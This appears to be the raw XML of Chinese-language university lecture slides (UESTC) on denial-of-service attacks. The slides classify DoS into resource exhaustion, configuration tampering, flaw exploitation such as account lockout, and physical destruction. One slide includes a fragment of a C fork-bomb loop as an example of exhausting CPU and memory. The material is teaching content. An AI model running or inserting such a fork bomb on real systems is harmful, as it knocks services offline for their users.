        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拒绝服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(Denial of Service)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BC1593B0-D709-4625-B1DF-86D6EEB138D3}"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en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DOS的基本模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>资源耗尽型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>www.uestc.edu.cn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356350"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UESTC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55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8" y="2500313"/>
            <a:ext cx="80629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fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="552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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>① 消耗网络带宽。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击者有意制造大量的数据报或传输大量文件以占用有限的网络带宽，致使合法用户无法正常使用网络资源。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>② 消耗磁盘空间。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击者利用磁盘空间的有限性或存储空间大小控制的缺陷，短时间内制造大量的垃圾信息，使系统或用户因没有磁盘空间而停止工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>③ 消耗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和内存资源。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>操作系统中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和内存资源由若干进程共用，攻击者利用系统存在的缺陷，过度使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和内存资源，导致系统服务性能下降甚至造成系统崩溃。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104450" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>DOS的基本模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20485" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UESTC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="462547" y="6165304"/>
            <a:ext cx="7748910" cy="2714625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr indent="2667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just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>中，下面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可消耗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>资源和内存资源的攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>{</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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	fork();</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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>	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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">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t>DOS的基本模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置修改型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356350"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UESTC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="573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428875"/>
            <a:ext cx="878681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1475656" y="5194822"/>
            <a:ext cx="4944020" cy="156966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lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>改变路由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>信息，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>造成不能访问网络；</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注册表；</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>系统的各种配置文件，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目录下的各种文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="下箭头 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3000375" y="4500563"/>
            <a:ext cx="357188" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>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7345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5734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ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>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ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>基于系统缺陷型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用目标系统和通信协议漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如一些系统出于安全考虑，限制用户试探口令次数和注册等待时间。当用户口令输入次数，或注册等待时间超过设定阈值，系统就会停止该用户的使用权。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击者有意输错口令导致系统锁定用户帐号，致使该用户得不到应有的服务。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>物理实体破坏型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过破坏或改变网络部件实现拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击目标包括：计算机、路由器、网络配线室、网络主干段、电源、冷却设备。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108546" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DOS的基本模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UESTC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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285750" y="1371600"/>
            <a:ext cx="8534400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务过载</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>向攻击目标计算机的服务守护进程，发起大量服务请求，使其服务过载。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击目标处理不断到来的服务请求，无法处理常规的任务。同时，许多新到来的请求被丢弃。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>如果攻击的是一个基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>协议的服务，那么这些请求的包还会被重发，结果更加重了网络的负担。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109571" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DOS攻击的基本形式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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blinds(horizontal)">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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="90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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="901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blinds(horizontal)">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lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分类方法： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>资源及其脆弱性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Resources and their Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脆弱性及攻击（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Vulnerability  and Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
